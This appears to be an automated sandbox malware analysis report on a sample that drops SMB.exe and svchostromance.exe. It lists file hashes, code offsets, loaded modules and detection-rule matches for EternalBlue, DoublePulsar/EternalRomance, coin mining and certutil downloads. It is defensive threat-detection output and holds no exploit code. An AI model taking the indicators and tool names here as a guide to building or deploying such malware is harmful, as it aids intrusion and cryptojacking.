Source: C:\ProgramData\SMB.exe Dropped file: MD5: fb82ba8bb7a402b05d06436991b10321 Family: Leafminer Alias: RASPITE, Leafminer Description: Leafminer, uncovered by Symantec, is an Iranian threat group that targeting a broad list of government organizations and business verticals in various regions in the Middle East since at least early 2017. References: https://www.jpost.com/Israel-News/Politics-And-Diplomacy/Report-Iran-targeted-Israel-in-cyber-attack-563937Data Source: https://github.com/RedDrip7/APT_Digital_Weapon
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_00631046 0_2_00631046
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_006314AF 0_2_006314AF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_0066066D 0_2_0066066D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_0061D6D3 0_2_0061D6D3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_00641710 0_2_00641710
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_0066DE6C 0_2_0066DE6C
Source: C:\ProgramData\SMB.exe Code function: 37_2_01335983 37_2_01335983
Source: C:\ProgramData\SMB.exe Code function: 37_2_013283EB 37_2_013283EB
Source: C:\ProgramData\SMB.exe Code function: 37_2_013231F0 37_2_013231F0
Source: C:\ProgramData\SMB.exe Code function: 37_2_0134001F 37_2_0134001F
Source: C:\ProgramData\SMB.exe Code function: 37_2_0132E097 37_2_0132E097
Source: C:\ProgramData\SMB.exe Code function: 37_2_013330E5 37_2_013330E5
Source: C:\ProgramData\SMB.exe Code function: 37_2_0133E8EC 37_2_0133E8EC
Source: C:\ProgramData\SMB.exe Code function: 37_2_0134E8D4 37_2_0134E8D4
Source: C:\ProgramData\SMB.exe Code function: 37_2_01332B39 37_2_01332B39
Source: C:\ProgramData\SMB.exe Code function: 37_2_01342B68 37_2_01342B68
Source: C:\ProgramData\SMB.exe Code function: 37_2_0134A350 37_2_0134A350
Source: C:\ProgramData\SMB.exe Code function: 37_2_013363F1 37_2_013363F1
Source: C:\ProgramData\SMB.exe Code function: 37_2_0132D222 37_2_0132D222
Source: C:\ProgramData\SMB.exe Code function: 37_2_0133F200 37_2_0133F200
Source: C:\ProgramData\SMB.exe Code function: 37_2_0132BA6A 37_2_0132BA6A
Source: C:\ProgramData\SMB.exe Code function: 37_2_0133FA6A 37_2_0133FA6A
Source: C:\ProgramData\SMB.exe Code function: 37_2_01332DB4 37_2_01332DB4
Source: C:\ProgramData\SMB.exe Code function: 37_2_01335DB8 37_2_01335DB8
Source: C:\ProgramData\SMB.exe Code function: 37_2_0133EDE8 37_2_0133EDE8
Source: C:\ProgramData\SMB.exe Code function: 37_2_0132DC32 37_2_0132DC32
Source: C:\ProgramData\SMB.exe Code function: 37_2_0132ECE9 37_2_0132ECE9
Source: C:\ProgramData\SMB.exe Code function: 37_2_01322759 37_2_01322759
Source: C:\ProgramData\SMB.exe Code function: 37_2_01334FB4 37_2_01334FB4
Source: C:\ProgramData\SMB.exe Code function: 37_2_01323F95 37_2_01323F95
Source: C:\ProgramData\SMB.exe Code function: 37_2_0132D634 37_2_0132D634
Source: C:\ProgramData\SMB.exe Code function: 37_2_0133F635 37_2_0133F635
Source: C:\ProgramData\SMB.exe Code function: 37_2_01349EA0 37_2_01349EA0
Source: C:\ProgramData\SMB.exe Code function: 37_2_01325E83 37_2_01325E83
Source: SMB.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SMB.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\ProgramData\SMB.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll Jump to behavior
Source: C:\ProgramData\SMB.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll Jump to behavior
Source: C:\ProgramData\SMB.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll Jump to behavior
Source: C:\ProgramData\SMB.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll Jump to behavior
Source: C:\ProgramData\SMB.exe Section loaded: <pi-ms-win-core-localization-l1-2-1.dll Jump to behavior
Source: C:\ProgramData\SMB.exe Section loaded: dxgidebug.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: xboxlivetitleid.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cdpsgshims.dll Jump to behavior
Source: C:\ProgramData\SMB.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\ProgramData\SMB.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\ProgramData\SMB.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\ProgramData\SMB.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\ProgramData\SMB.exe Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\ProgramData\SMB.exe Section loaded: dxgidebug.dll
Source: Joe Sandbox View Dropped File: C:\ProgramData\SMB.exe 5214F356F2E8640230E93A95633CD73945C38027B23E76BB5E617C71949F8994
Source: Joe Sandbox View Dropped File: C:\ProgramData\adfw-2.dll F06D02359666B763E189402B7FBF9DFA83BA6F4DA2E7D037B3F9AEBEFD2D5A45
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe, type: SAMPLE Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 0.2.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 11.0.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 66.2.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 11.2.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 36.0.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 66.0.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 65.2.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 65.0.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 36.2.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 0.0.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 00000000.00000000.246558745.000000000075C000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000024.00000000.282923064.000000000075C000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000000.00000002.337792193.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000002.340838407.00000000042CD000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000000.00000002.340838407.00000000042CD000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000000B.00000000.261351835.000000000075C000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000042.00000000.306856950.000000000075C000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000000.00000002.336175493.0000000000769000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000002.336175493.0000000000769000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000024.00000002.284640590.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000024.00000002.284640590.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000024.00000002.284640590.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 0000000B.00000000.261054855.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 0000000B.00000000.261054855.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 0000000B.00000000.261054855.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 00000000.00000000.246392472.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000000.246392472.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000000.00000000.246392472.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 00000041.00000000.301932792.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000041.00000000.301932792.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000041.00000000.301932792.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 00000000.00000002.336119364.000000000075C000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000042.00000000.306247565.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000042.00000000.306247565.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000042.00000000.306247565.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 00000042.00000002.335911830.000000000075C000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000024.00000000.282865261.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000024.00000000.282865261.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000024.00000000.282865261.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 00000041.00000000.302006750.000000000075C000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 0000000B.00000002.271375343.000000000075C000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000000.00000002.338831171.00000000031CE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000000.00000002.338831171.00000000031CE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000000.00000002.335862211.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000002.335862211.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000000.00000002.335862211.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 00000042.00000002.335587217.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000042.00000002.335587217.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000042.00000002.335587217.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 00000041.00000002.307534563.000000000075C000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 0000000B.00000002.271006999.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 0000000B.00000002.271006999.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 0000000B.00000002.271006999.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 00000024.00000002.285729583.000000000075C000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000041.00000002.307114937.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000041.00000002.307114937.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000041.00000002.307114937.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 2480, type: MEMORYSTR Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 2480, type: MEMORYSTR Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 2480, type: MEMORYSTR Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 4140, type: MEMORYSTR Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 4140, type: MEMORYSTR Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 4140, type: MEMORYSTR Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 4140, type: MEMORYSTR Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 6760, type: MEMORYSTR Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 6760, type: MEMORYSTR Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 6760, type: MEMORYSTR Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 6760, type: MEMORYSTR Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 6612, type: MEMORYSTR Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 6612, type: MEMORYSTR Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 6612, type: MEMORYSTR Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 6612, type: MEMORYSTR Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 4204, type: MEMORYSTR Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 4204, type: MEMORYSTR Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 4204, type: MEMORYSTR Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 4204, type: MEMORYSTR Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: C:\ProgramData\coli-0.dll, type: DROPPED Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: C:\ProgramData\svchostromance.exe, type: DROPPED Matched rule: EquationGroup_Toolset_Apr17_Doublepulsar_1_3_1 date = 2017-04-15, hash1 = 15ffbb8d382cd2ff7b0bd4c87a7c0bffd1541c2fe86865af445123bc0b770d13, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\ProgramData\svchostromance.exe, type: DROPPED Matched rule: EquationGroup_Toolset_Apr17_Eternalromance_2 date = 2017-04-15, hash3 = 92c6a9e648bfd98bbceea3813ce96c6861487826d6b2c3d462debae73ed25b34, hash2 = b99c3cc1acbb085c9a895a8c3510f6daaf31f0d2d9ccb8477c7fb7119376f57b, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = f1ae9fdbb660aae3421fd3e5b626c1e537d8e9ee2f9cd6d56cb70b6878eaca5d
Source: C:\ProgramData\svchostromance.exe, type: DROPPED Matched rule: EquationGroup_Toolset_Apr17_Eternalromance date = 2017-04-15, hash2 = b99c3cc1acbb085c9a895a8c3510f6daaf31f0d2d9ccb8477c7fb7119376f57b, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = f1ae9fdbb660aae3421fd3e5b626c1e537d8e9ee2f9cd6d56cb70b6878eaca5d
Source: C:\ProgramData\svchostromance.exe, type: DROPPED Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: C:\ProgramData\svchostlong.xml, type: DROPPED Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: C:\ProgramData\svchostromance.xml, type: DROPPED Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
